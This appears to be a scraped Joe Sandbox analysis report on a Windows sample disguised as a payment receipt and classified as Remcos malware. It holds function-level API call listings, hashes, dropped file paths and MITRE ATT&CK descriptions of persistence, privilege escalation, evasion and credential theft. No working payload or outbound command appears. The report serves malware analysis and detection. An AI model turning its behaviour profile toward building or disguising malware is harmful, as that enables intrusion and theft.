Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9

Uniqueness

Uniqueness Score: -1.00%

Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
KillTimer.USER32(?,00000041), ref: 004060D7
KillTimer.USER32(?,00000041), ref: 004060E8
GetTickCount.KERNEL32 ref: 0040610B
GetParent.USER32(?), ref: 00406136
SendMessageW.USER32(00000000), ref: 0040613D
BeginDeferWindowPos.USER32(00000004), ref: 0040614B
EndDeferWindowPos.USER32(00000000), ref: 0040619B
InvalidateRect.USER32(?,?,00000001), ref: 004061A7

Strings

A, xrefs: 004060F3

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
String ID: A
API String ID: 2892645895-3554254475
Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
wcscpy.MSVCRT ref: 0040A0D9
wcscat.MSVCRT ref: 0040A0E6
wcscat.MSVCRT ref: 0040A0F5
wcscpy.MSVCRT ref: 0040A107

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: Time$Formatwcscatwcscpy$DateFileSystem
String ID:
API String ID: 1331804452-0
Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A

Uniqueness

Uniqueness Score: -1.00%

Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410055
memset.MSVCRT ref: 0041006A
_snwprintf.MSVCRT ref: 004100B7

Strings

<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
<?xml version="1.0" ?>, xrefs: 0041007C
<%s>, xrefs: 004100A6

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memset$_snwprintf
String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3473751417-2880344631
Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99

Uniqueness

Uniqueness Score: -1.00%

Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5

GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
??2@YAPAXI@Z.MSVCRT ref: 004450BE
memset.MSVCRT ref: 004450CD

Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306

??3@YAXPAX@Z.MSVCRT ref: 004450F0

Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D

CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
String ID:
API String ID: 1471605966-0
Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD

Uniqueness

Uniqueness Score: -1.00%

Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004100FB
memset.MSVCRT ref: 00410112

Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE

_snwprintf.MSVCRT ref: 00410141

Strings

</%s>, xrefs: 00410130

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: memset$_snwprintf_wcslwrwcscpy
String ID: </%s>
API String ID: 3400436232-259020660
Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99

Uniqueness

Uniqueness Score: -1.00%

Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00412057

Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C

SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
GetKeyState.USER32(00000010), ref: 0041210D

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: ExecuteMenuMessageSendShellStateStringmemset
String ID:
API String ID: 3550944819-0
Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14

Uniqueness

Uniqueness Score: -1.00%

Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040B0D8
??3@YAXPAX@Z.MSVCRT ref: 0040B0FB

Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31

??3@YAXPAX@Z.MSVCRT ref: 0040B12C
memcpy.MSVCRT ref: 0040B159

Memory Dump Source

Source File: 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_proof of paymentt.jbxd

Similarity

API ID: ??3@$memcpy$mallocstrlen
String ID:
API String ID: 1171893557-0
Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report proof of paymentt.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\remcos\logs.dat

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mQpdTSxCjbPop.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\proof of paymentt.exe.log

Windows Analysis Report
proof of paymentt.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre